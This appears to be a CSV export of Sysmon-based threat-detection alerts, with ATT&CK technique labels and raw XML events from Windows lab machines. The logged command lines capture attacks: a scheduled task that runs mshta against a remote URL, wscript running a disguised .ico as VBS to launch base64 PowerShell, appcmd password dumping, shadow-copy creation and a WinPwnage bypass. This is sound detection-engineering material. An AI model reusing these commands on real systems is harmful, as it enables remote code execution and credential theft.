<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR &quot;mshta.exe https://hotelesms.com/Injection.txt&quot; /F </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ParentProcessId"">2432</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T22:52:27.588976Z"">
</TimeCreated>
<EventRecordID>10154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1936"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 22:52:27.588</Data>
<Data Name=""ProcessGuid"">365ABB72-D1AB-5CC8-0000-0010DB1E4400</Data>
<Data Name=""ProcessId"">1372</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-C494-5CC8-0000-0020E4FF0000</Data>
<Data Name=""LogonId"">0xffe4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D0E5-5CC8-0000-0010DADF3E00</Data>
<Data Name=""ParentProcessId"">2892</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript running script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;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&apos;)))&quot;&quot;&quot;) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T11:53:30.022856Z"">
</TimeCreated>
<EventRecordID>10662</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 11:53:29.768</Data>
<Data Name=""ProcessGuid"">747F3D96-F639-5D53-0000-0010B0FC2600</Data>
<Data Name=""ProcessId"">8180</Data>
<Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;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&apos;)))&quot;&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F639-5D53-0000-001092EE2600</Data>
<Data Name=""ParentProcessId"">6000</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:vdir.name ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.822932Z"">
</TimeCreated>
<EventRecordID>5937</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.782</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00106FA6FF00</Data>
<Data Name=""ProcessId"">1876</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:vdir.name</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.556756Z"">
</TimeCreated>
<EventRecordID>16389</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.275</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ProcessId"">2936</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ParentProcessId"">2960</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:47.402708Z"">
</TimeCreated>
<EventRecordID>6180</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:47.402</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
<Data Name=""ProcessId"">3448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:47.402708Z"">
</TimeCreated>
<EventRecordID>6180</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:47.402</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
<Data Name=""ProcessId"">3448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home ) and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:59.389278Z"">
</TimeCreated>
<EventRecordID>4128</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3628"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 06:58:39.888</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49703</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">108.179.232.58</Data>
<Data Name=""DestinationHostname"">gator4243.hostgator.com</Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T22:49:10.198351Z"">
</TimeCreated>
<EventRecordID>10153</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1936"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 22:49:09.276</Data>
<Data Name=""ProcessGuid"">365ABB72-D0E5-5CC8-0000-0010DADF3E00</Data>
<Data Name=""ProcessId"">2892</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-C494-5CC8-0000-0020E4FF0000</Data>
<Data Name=""LogonId"">0xffe4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D0E4-5CC8-0000-00103CB73E00</Data>
<Data Name=""ParentProcessId"">3680</Data>
<Data Name=""ParentImage"">C:\Windows\Installer\MSI4FFD.tmp</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\Installer\MSI4FFD.tmp&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.742817Z"">
</TimeCreated>
<EventRecordID>5934</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.702</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010AFA2FF00</Data>
<Data Name=""ProcessId"">3812</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
</TimeCreated>
<EventRecordID>16388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ProcessId"">2960</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
<Data Name=""ParentProcessId"">1332</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
